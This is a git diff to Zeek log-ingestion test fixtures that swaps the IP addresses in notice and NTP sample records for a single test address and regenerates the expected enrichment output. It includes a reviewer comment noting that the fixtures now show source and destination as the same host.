-{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1551393388.426472,\"note\":\"Scan::Port_Scan\",\"msg\":\"8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s\",\"sub\":\"remote\",\"src\":\"8.42.77.171\",\"dst\":\"207.154.238.205\",\"peer_descr\":\"bro\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0,\"dropped\":false}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/notice.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}}
+{"ts":1617097929.601155,"uid":"CmvrSS1wIiuOGYCbfi","id.orig_h":"10.156.0.2","id.orig_p":48818,"id.resp_h":"89.160.20.156","id.resp_p":443,"fuid":"F39b0Bdfm3FW1rNS5","proto":"tcp","note":"SSL::Invalid_Server_Cert","msg":"SSL certificate validation failed with (self signed certificate)","sub":"CN=*.badssl.com,O=BadSSL,L=San Francisco,ST=California,C=US","src":"10.156.0.2","dst":"89.160.20.156","p":443,"actions":["Notice::ACTION_LOG"],"suppress_for":3600.0}
+{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1551393388.426472,\"note\":\"Scan::Port_Scan\",\"msg\":\"89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s\",\"sub\":\"remote\",\"src\":\"89.160.20.156\",\"dst\":\"89.160.20.156\",\"peer_descr\":\"bro\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0,\"dropped\":false}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/notice.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}}
diff --git a/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log-expected.json b/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log-expected.json
index 37d46b92c2e..491f17eabb2 100644
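Review bot: In the rewritten Scan::Port_Scan records (both the plain line and the `_raw` copy inside the Splunk-wrapped line), `src`, `dst` and both addresses in `msg` were all set to 89.160.20.156, so the fixture now describes a host port-scanning itself; the regenerated expected file accordingly lists a single `related.ip` entry where it previously had two and gives `source` and `destination` identical geo/AS enrichment. That means this test no longer checks that the pipeline keeps the notice's source and destination apart or that `related.ip` is populated from both sides, which is the enrichment a detection consumer of this data stream depends on. The ntp.log hunk below has the same problem, with `id.orig_h` and `id.resp_h` both set to 89.160.20.156. Using a second address from the same supported test subset for one side, e.g. `"src":"<SECOND_SUPPORTED_TEST_IP>","dst":"89.160.20.156"` (placeholder, pick one the runner's geo database covers), would preserve that coverage.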
--- a/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log-expected.json +++ b/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log-expected.json @@ -32,7 +32,7 @@ "ip": "172.16.238.1" }, "event": { - "ingested": "2021-08-11T19:18:32.286947900Z", + "ingested": "2021-12-09T13:51:05.490792100Z", "original": "{\"ts\":1320435875.879278,\"note\":\"SSH::Password_Guessing\",\"msg\":\"172.16.238.1 appears to be guessing SSH passwords (seen in 30 connections).\",\"sub\":\"Sampled servers: 172.16.238.136, 172.16.238.136, 172.16.238.136, 172.16.238.136, 172.16.238.136\",\"src\":\"172.16.238.1\",\"peer_descr\":\"bro\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0,\"dropped\":false}", "category": [ "intrusion_detection" @@ -55,35 +55,34 @@ }, "related": { "ip": [ - "8.42.77.171", - "207.154.238.205" + "89.160.20.156" ] }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-HE", - "city_name": "Frankfurt am Main", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Hesse", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 8.6843, - "lat": 50.1188 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 14061, + "number": 29518, "organization": { - "name": "DigitalOcean, LLC" + "name": "Bredband2 AB" } }, - "address": "207.154.238.205", - "ip": "207.154.238.205" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "zeek": { "notice": { - "msg": "8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s", + "msg": "89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s", "suppress_for": 3600.0, "note": "Scan::Port_Scan", "sub": "remote", 
@@ -96,33 +95,33 @@ }, "rule": { "name": "Scan::Port_Scan", - "description": "8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s" + "description": "89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CO", - "city_name": "Longmont", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Colorado", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -105.1624, - "lat": 40.1559 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 393552, + "number": 29518, "organization": { - "name": "Longmont Power \u0026 Communications" + "name": "Bredband2 AB" } }, - "address": "8.42.77.171", - "ip": "8.42.77.171" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-08-11T19:18:32.286998400Z", - "original": "{\"ts\":1551393388.426472,\"note\":\"Scan::Port_Scan\",\"msg\":\"8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s\",\"sub\":\"remote\",\"src\":\"8.42.77.171\",\"dst\":\"207.154.238.205\",\"peer_descr\":\"bro\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0,\"dropped\":false}", + "ingested": "2021-12-09T13:51:05.490800300Z", + "original": "{\"ts\":1551393388.426472,\"note\":\"Scan::Port_Scan\",\"msg\":\"89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s\",\"sub\":\"remote\",\"src\":\"89.160.20.156\",\"dst\":\"89.160.20.156\",\"peer_descr\":\"bro\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0,\"dropped\":false}", "category": [ "intrusion_detection" ], 
@@ -157,7 +156,7 @@ "description": "The capture loss script detected an estimated loss rate above 88.306%" }, "event": { - "ingested": "2021-08-11T19:18:32.287007500Z", + "ingested": "2021-12-09T13:51:05.490806100Z", "original": "{\"ts\":1617097740.958466,\"note\":\"CaptureLoss::Too_Much_Loss\",\"msg\":\"The capture loss script detected an estimated loss rate above 88.306%\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0}", "category": [ "intrusion_detection" @@ -175,25 +174,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "104.154.89.105", + "address": "89.160.20.156", "port": 443, - "ip": "104.154.89.105" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CmvrSS1wIiuOGYCbfi", @@ -222,7 +222,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:epLQwe8pc8f0Ay9N+VzTshscAGE=", + "community_id": "1:Dff30r1qWk7lVgWVwXvU4AAuxU8=", "transport": "tcp" }, "@timestamp": "2021-03-30T09:52:09.601Z", 
@@ -232,12 +232,12 @@ "related": { "ip": [ "10.156.0.2", - "104.154.89.105" + "89.160.20.156" ] }, "event": { - "ingested": "2021-08-11T19:18:32.287015500Z", - "original": "{\"ts\":1617097929.601155,\"uid\":\"CmvrSS1wIiuOGYCbfi\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":48818,\"id.resp_h\":\"104.154.89.105\",\"id.resp_p\":443,\"fuid\":\"F39b0Bdfm3FW1rNS5\",\"proto\":\"tcp\",\"note\":\"SSL::Invalid_Server_Cert\",\"msg\":\"SSL certificate validation failed with (self signed certificate)\",\"sub\":\"CN=*.badssl.com,O=BadSSL,L=San Francisco,ST=California,C=US\",\"src\":\"10.156.0.2\",\"dst\":\"104.154.89.105\",\"p\":443,\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0}", + "ingested": "2021-12-09T13:51:05.490811700Z", + "original": "{\"ts\":1617097929.601155,\"uid\":\"CmvrSS1wIiuOGYCbfi\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":48818,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"fuid\":\"F39b0Bdfm3FW1rNS5\",\"proto\":\"tcp\",\"note\":\"SSL::Invalid_Server_Cert\",\"msg\":\"SSL certificate validation failed with (self signed certificate)\",\"sub\":\"CN=*.badssl.com,O=BadSSL,L=San Francisco,ST=California,C=US\",\"src\":\"10.156.0.2\",\"dst\":\"89.160.20.156\",\"p\":443,\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", "id": "CmvrSS1wIiuOGYCbfi", 
@@ -258,28 +258,28 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-HE", - "city_name": "Frankfurt am Main", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Hesse", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 8.6843, - "lat": 50.1188 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 14061, + "number": 29518, "organization": { - "name": "DigitalOcean, LLC" + "name": "Bredband2 AB" } }, - "address": "207.154.238.205", - "ip": "207.154.238.205" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "zeek": { "notice": { - "msg": "8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s", + "msg": "89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s", "suppress_for": 3600.0, "note": "Scan::Port_Scan", "sub": "remote", @@ -292,29 +292,29 @@ }, "rule": { "name": "Scan::Port_Scan", - "description": "8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s" + "description": "89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CO", - "city_name": "Longmont", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Colorado", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -105.1624, - "lat": 40.1559 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 393552, + "number": 29518, "organization": { - "name": "Longmont Power \u0026 Communications" + "name": "Bredband2 AB" } }, - "address": "8.42.77.171", - "ip": "8.42.77.171" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event" 
@@ -325,16 +325,15 @@ }, "related": { "ip": [ - "8.42.77.171", - "207.154.238.205" + "89.160.20.156" ] }, "host": { "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:32.287021600Z", - "original": "{\"ts\":1551393388.426472,\"note\":\"Scan::Port_Scan\",\"msg\":\"8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s\",\"sub\":\"remote\",\"src\":\"8.42.77.171\",\"dst\":\"207.154.238.205\",\"peer_descr\":\"bro\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0,\"dropped\":false}", + "ingested": "2021-12-09T13:51:05.490817200Z", + "original": "{\"ts\":1551393388.426472,\"note\":\"Scan::Port_Scan\",\"msg\":\"89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s\",\"sub\":\"remote\",\"src\":\"89.160.20.156\",\"dst\":\"89.160.20.156\",\"peer_descr\":\"bro\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0,\"dropped\":false}", "category": [ "intrusion_detection" ], diff --git a/packages/zeek/data_stream/ntlm/_dev/test/pipeline/test-ntlm.log-expected.json b/packages/zeek/data_stream/ntlm/_dev/test/pipeline/test-ntlm.log-expected.json index d4799184331..5b7004c6c83 100644 --- a/packages/zeek/data_stream/ntlm/_dev/test/pipeline/test-ntlm.log-expected.json +++ b/packages/zeek/data_stream/ntlm/_dev/test/pipeline/test-ntlm.log-expected.json @@ -48,7 +48,7 @@ ] }, "event": { - "ingested": "2021-08-11T19:18:32.998197400Z", + "ingested": "2021-12-09T13:51:06.115477800Z", "original": "{\"ts\":1508959117.814467,\"uid\":\"CHphiNUKDC20fsy09\",\"id.orig_h\":\"192.168.10.50\",\"id.orig_p\":46785,\"id.resp_h\":\"192.168.10.31\",\"id.resp_p\":445,\"username\":\"JeffV\",\"hostname\":\"ybaARon55QykXrgu\",\"domainname\":\"contoso.local\",\"server_nb_computer_name\":\"VICTIM-PC\",\"server_dns_computer_name\":\"Victim-PC.contoso.local\",\"server_tree_name\":\"contoso.local\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -123,7 +123,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:32.998209300Z", + "ingested": "2021-12-09T13:51:06.115485200Z", "original": "{\"ts\":1508959117.814467,\"uid\":\"CHphiNUKDC20fsy09\",\"id.orig_h\":\"192.168.10.50\",\"id.orig_p\":46785,\"id.resp_h\":\"192.168.10.31\",\"id.resp_p\":445,\"username\":\"JeffV\",\"hostname\":\"ybaARon55QykXrgu\",\"domainname\":\"contoso.local\",\"server_nb_computer_name\":\"VICTIM-PC\",\"server_dns_computer_name\":\"Victim-PC.contoso.local\",\"server_tree_name\":\"contoso.local\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log b/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log index 9799c888dba..98c494dec42 100644 --- a/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log +++ b/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log 
@@ -1,2 +1,2 @@
-{"ts":1602116947.977,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"130.118.205.62","id.orig_p":38461,"id.resp_h":"208.79.89.249","id.resp_p":123,"version":4,"mode":3,"stratum":0,"poll":1,"precision":1,"root_delay":0,"root_disp":0,"ref_id":"\\x00\\x00\\x00\\x00","ref_time":0,"org_time":0,"rec_time":0,"xmt_time":1602116947.215,"num_exts":0}
-{"ts":1602116948.081,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"130.118.205.62","id.orig_p":38461,"id.resp_h":"208.79.89.249","id.resp_p":123,"version":4,"mode":4,"stratum":2,"poll":8,"precision":5.960464477539063e-8,"root_delay":0.00921630859375,"root_disp":0.0212249755859375,"ref_id":"127.67.113.92","ref_time":1602116655.942,"org_time":1602116947.215,"rec_time":1602116947.964,"xmt_time":1602116947.964,"num_exts":0}
+{"ts":1602116947.977,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"89.160.20.156","id.orig_p":38461,"id.resp_h":"89.160.20.156","id.resp_p":123,"version":4,"mode":3,"stratum":0,"poll":1,"precision":1,"root_delay":0,"root_disp":0,"ref_id":"\\x00\\x00\\x00\\x00","ref_time":0,"org_time":0,"rec_time":0,"xmt_time":1602116947.215,"num_exts":0}
+{"ts":1602116948.081,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"89.160.20.156","id.orig_p":38461,"id.resp_h":"89.160.20.156","id.resp_p":123,"version":4,"mode":4,"stratum":2,"poll":8,"precision":5.960464477539063e-8,"root_delay":0.00921630859375,"root_disp":0.0212249755859375,"ref_id":"127.67.113.92","ref_time":1602116655.942,"org_time":1602116947.215,"rec_time":1602116947.964,"xmt_time":1602116947.964,"num_exts":0}
diff --git a/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log-expected.json b/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log-expected.json
index d89a329fbab..d396a03c1e0 100644
--- a/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log-expected.json
+++ b/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log-expected.json
@@ -7,29 +7,31 @@
 },
 "related": {
 "ip": [
- "130.118.205.62",
- "208.79.89.249"
+ "89.160.20.156"
 ]
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 17.8167,
+ "lat": 59.2
+ }
 },
 "as": {
- "number": 25795,
+ "number": 29518,
 "organization": {
- "name": "ARP NETWORKS, INC."
+ "name": "Bredband2 AB"
 }
 },
- "address": "208.79.89.249",
+ "address": "89.160.20.156",
 "port": 123,
- "ip": "208.79.89.249"
+ "ip": "89.160.20.156"
 },
 "zeek": {
 "session_id": "CqlPpF1AQVLMPgGiL5", 
@@ -51,21 +53,30 @@
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 17.8167,
+ "lat": 59.2
+ }
+ },
+ "as": {
+ "number": 29518,
+ "organization": {
+ "name": "Bredband2 AB"
+ }
 },
- "address": "130.118.205.62",
+ "address": "89.160.20.156",
 "port": 38461,
- "ip": "130.118.205.62"
+ "ip": "89.160.20.156"
 },
 "event": {
- "ingested": "2021-08-26T12:37:14.367022936Z",
- "original": "{\"ts\":1602116947.977,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"130.118.205.62\",\"id.orig_p\":38461,\"id.resp_h\":\"208.79.89.249\",\"id.resp_p\":123,\"version\":4,\"mode\":3,\"stratum\":0,\"poll\":1,\"precision\":1,\"root_delay\":0,\"root_disp\":0,\"ref_id\":\"\\\\x00\\\\x00\\\\x00\\\\x00\",\"ref_time\":0,\"org_time\":0,\"rec_time\":0,\"xmt_time\":1602116947.215,\"num_exts\":0}",
+ "ingested": "2021-12-09T13:51:06.504150200Z",
+ "original": "{\"ts\":1602116947.977,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38461,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":123,\"version\":4,\"mode\":3,\"stratum\":0,\"poll\":1,\"precision\":1,\"root_delay\":0,\"root_disp\":0,\"ref_id\":\"\\\\x00\\\\x00\\\\x00\\\\x00\",\"ref_time\":0,\"org_time\":0,\"rec_time\":0,\"xmt_time\":1602116947.215,\"num_exts\":0}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "id": "CqlPpF1AQVLMPgGiL5",
@@ -81,7 +92,7 @@
 ],
 "network": {
 "protocol": "ntp",
- "community_id": "1:IDiKR+C1G8mk7LQhFpp+4p1tHrk=",
+ "community_id": "1:8alLEvkgWQ2DN8cL1UQ7Gupfwe4=",
 "transport": "udp",
 "type": "ipv4"
 } 
@@ -93,29 +104,31 @@
 },
 "related": {
 "ip": [
- "130.118.205.62",
- "208.79.89.249"
+ "89.160.20.156"
 ]
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 17.8167,
+ "lat": 59.2
+ }
 },
 "as": {
- "number": 25795,
+ "number": 29518,
 "organization": {
- "name": "ARP NETWORKS, INC."
+ "name": "Bredband2 AB"
 }
 },
- "address": "208.79.89.249",
+ "address": "89.160.20.156",
 "port": 123,
- "ip": "208.79.89.249"
+ "ip": "89.160.20.156"
 },
 "zeek": {
 "session_id": "CqlPpF1AQVLMPgGiL5", 
@@ -137,21 +150,30 @@
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 17.8167,
+ "lat": 59.2
+ }
+ },
+ "as": {
+ "number": 29518,
+ "organization": {
+ "name": "Bredband2 AB"
+ }
 },
- "address": "130.118.205.62",
+ "address": "89.160.20.156",
 "port": 38461,
- "ip": "130.118.205.62"
+ "ip": "89.160.20.156"
 },
 "event": {
- "ingested": "2021-08-26T12:37:14.367053691Z",
- "original": "{\"ts\":1602116948.081,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"130.118.205.62\",\"id.orig_p\":38461,\"id.resp_h\":\"208.79.89.249\",\"id.resp_p\":123,\"version\":4,\"mode\":4,\"stratum\":2,\"poll\":8,\"precision\":5.960464477539063e-8,\"root_delay\":0.00921630859375,\"root_disp\":0.0212249755859375,\"ref_id\":\"127.67.113.92\",\"ref_time\":1602116655.942,\"org_time\":1602116947.215,\"rec_time\":1602116947.964,\"xmt_time\":1602116947.964,\"num_exts\":0}",
+ "ingested": "2021-12-09T13:51:06.504154100Z",
+ "original": "{\"ts\":1602116948.081,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38461,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":123,\"version\":4,\"mode\":4,\"stratum\":2,\"poll\":8,\"precision\":5.960464477539063e-8,\"root_delay\":0.00921630859375,\"root_disp\":0.0212249755859375,\"ref_id\":\"127.67.113.92\",\"ref_time\":1602116655.942,\"org_time\":1602116947.215,\"rec_time\":1602116947.964,\"xmt_time\":1602116947.964,\"num_exts\":0}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "id": "CqlPpF1AQVLMPgGiL5",
@@ -167,7 +189,7 @@
 ],
 "network": {
 "protocol": "ntp",
- "community_id": "1:IDiKR+C1G8mk7LQhFpp+4p1tHrk=",
+ "community_id": "1:8alLEvkgWQ2DN8cL1UQ7Gupfwe4=",
 "transport": "udp",
 "type": "ipv4"
 } 
diff --git a/packages/zeek/data_stream/ocsp/_dev/test/pipeline/test-ocsp.log-expected.json b/packages/zeek/data_stream/ocsp/_dev/test/pipeline/test-ocsp.log-expected.json
index 2fa4e14ea90..1884e9707ab 100644
--- a/packages/zeek/data_stream/ocsp/_dev/test/pipeline/test-ocsp.log-expected.json
+++ b/packages/zeek/data_stream/ocsp/_dev/test/pipeline/test-ocsp.log-expected.json
@@ -27,7 +27,7 @@
 }
 },
 "event": {
- "ingested": "2021-08-11T19:18:33.502421100Z",
+ "ingested": "2021-12-09T13:51:07.066331400Z",
 "original": "{\"ts\":1307712421.847886,\"id\":\"FSEWoS3ff8FcTn3WLf\",\"hashAlgorithm\":\"sha1\",\"issuerNameHash\":\"14A7E219F46B93E141258F08BC85764671F136B0\",\"issuerKeyHash\":\"EEDD79C0D379B04D7E47BC70A6E7C62AAEBADEC9\",\"serialNumber\":\"9239D5348F40D1695A745470E1F23F43\",\"certStatus\":\"revoked\",\"revoketime\":1300220120.0,\"thisUpdate\":1307640343.0,\"nextUpdate\":1307985943.0}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event"
@@ -63,7 +63,7 @@
 }
 },
 "event": {
- "ingested": "2021-08-11T19:18:33.502432100Z",
+ "ingested": "2021-12-09T13:51:07.066340100Z",
 "original": "{\"ts\":1307562416.100084,\"id\":\"FdZBFMEYgAErVhoC8\",\"hashAlgorithm\":\"sha1\",\"issuerNameHash\":\"6C2BC55AAF8D96BF60ADF81D023F23B48A0059C2\",\"issuerKeyHash\":\"A5EF0B11CEC04103A34A659048B21CE0572D7D47\",\"serialNumber\":\"30119E6EF41BDBA3FEFE711DBE8F6191\",\"certStatus\":\"good\",\"thisUpdate\":1307549998.0,\"nextUpdate\":1308154798.0}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event" 
@@ -107,7 +107,7 @@
 }
 },
 "event": {
- "ingested": "2021-08-11T19:18:33.502439800Z",
+ "ingested": "2021-12-09T13:51:07.066346600Z",
 "original": "{\"ts\":1307562416.100084,\"id\":\"FdZBFMEYgAErVhoC8\",\"hashAlgorithm\":\"sha1\",\"issuerNameHash\":\"6C2BC55AAF8D96BF60ADF81D023F23B48A0059C2\",\"issuerKeyHash\":\"A5EF0B11CEC04103A34A659048B21CE0572D7D47\",\"serialNumber\":\"30119E6EF41BDBA3FEFE711DBE8F6191\",\"certStatus\":\"good\",\"thisUpdate\":1307549998.0,\"nextUpdate\":1308154798.0}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event"
diff --git a/packages/zeek/data_stream/pe/_dev/test/pipeline/test-pe.log-expected.json b/packages/zeek/data_stream/pe/_dev/test/pipeline/test-pe.log-expected.json
index 1ecdfd1c4df..099784ba16d 100644
--- a/packages/zeek/data_stream/pe/_dev/test/pipeline/test-pe.log-expected.json
+++ b/packages/zeek/data_stream/pe/_dev/test/pipeline/test-pe.log-expected.json
@@ -32,7 +32,7 @@
 }
 },
 "event": {
- "ingested": "2021-08-11T19:18:33.839619700Z",
+ "ingested": "2021-12-09T13:51:07.328453Z",
 "original": "{\"ts\":1507565599.578328,\"id\":\"FtIFnm3ZqI1s96P74l\",\"machine\":\"I386\",\"compile_ts\":1467139314.0,\"os\":\"Windows XP\",\"subsystem\":\"WINDOWS_CUI\",\"is_exe\":true,\"is_64bit\":false,\"uses_aslr\":true,\"uses_dep\":true,\"uses_code_integrity\":false,\"uses_seh\":true,\"has_import_table\":true,\"has_export_table\":false,\"has_cert_table\":true,\"has_debug_data\":false,\"section_names\":[\".text\",\".rdata\",\".data\",\".rsrc\",\".reloc\"]}",
 "category": [
 "file" 
@@ -87,7 +87,7 @@
 }
 },
 "event": {
- "ingested": "2021-08-11T19:18:33.839668500Z",
+ "ingested": "2021-12-09T13:51:07.328459900Z",
 "original": "{\"ts\":1507565599.578328,\"id\":\"FtIFnm3ZqI1s96P74l\",\"machine\":\"I386\",\"compile_ts\":1467139314.0,\"os\":\"Windows XP\",\"subsystem\":\"WINDOWS_CUI\",\"is_exe\":true,\"is_64bit\":false,\"uses_aslr\":true,\"uses_dep\":true,\"uses_code_integrity\":false,\"uses_seh\":true,\"has_import_table\":true,\"has_export_table\":false,\"has_cert_table\":true,\"has_debug_data\":false,\"section_names\":[\".text\",\".rdata\",\".data\",\".rsrc\",\".reloc\"]}",
 "category": [
 "file"
diff --git a/packages/zeek/data_stream/radius/_dev/test/pipeline/test-radius.log-expected.json b/packages/zeek/data_stream/radius/_dev/test/pipeline/test-radius.log-expected.json
index 702a2459b58..64282c8e9aa 100644
--- a/packages/zeek/data_stream/radius/_dev/test/pipeline/test-radius.log-expected.json
+++ b/packages/zeek/data_stream/radius/_dev/test/pipeline/test-radius.log-expected.json
@@ -41,7 +41,7 @@
 ]
 },
 "event": {
- "ingested": "2021-08-11T19:18:34.144226700Z",
+ "ingested": "2021-12-09T13:51:07.578196900Z",
 "original": "{\"ts\":1217631137.916736,\"uid\":\"CRe9VD3flCDWbPmpIh\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":1645,\"id.resp_h\":\"10.0.0.100\",\"id.resp_p\":1812,\"username\":\"John.McGuirk\",\"mac\":\"00:14:22:e9:54:5e\",\"result\":\"success\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -109,7 +109,7 @@
 "name": "Lees-MBP.localdomain"
 },
 "event": {
- "ingested": "2021-08-11T19:18:34.144237500Z",
+ "ingested": "2021-12-09T13:51:07.578205400Z",
 "original": "{\"ts\":1217631137.916736,\"uid\":\"CRe9VD3flCDWbPmpIh\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":1645,\"id.resp_h\":\"10.0.0.100\",\"id.resp_p\":1812,\"username\":\"John.McGuirk\",\"mac\":\"00:14:22:e9:54:5e\",\"result\":\"success\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event", 
diff --git a/packages/zeek/data_stream/rdp/_dev/test/pipeline/test-rdp.log-expected.json b/packages/zeek/data_stream/rdp/_dev/test/pipeline/test-rdp.log-expected.json
index ab93f171198..03bd4ffb157 100644
--- a/packages/zeek/data_stream/rdp/_dev/test/pipeline/test-rdp.log-expected.json
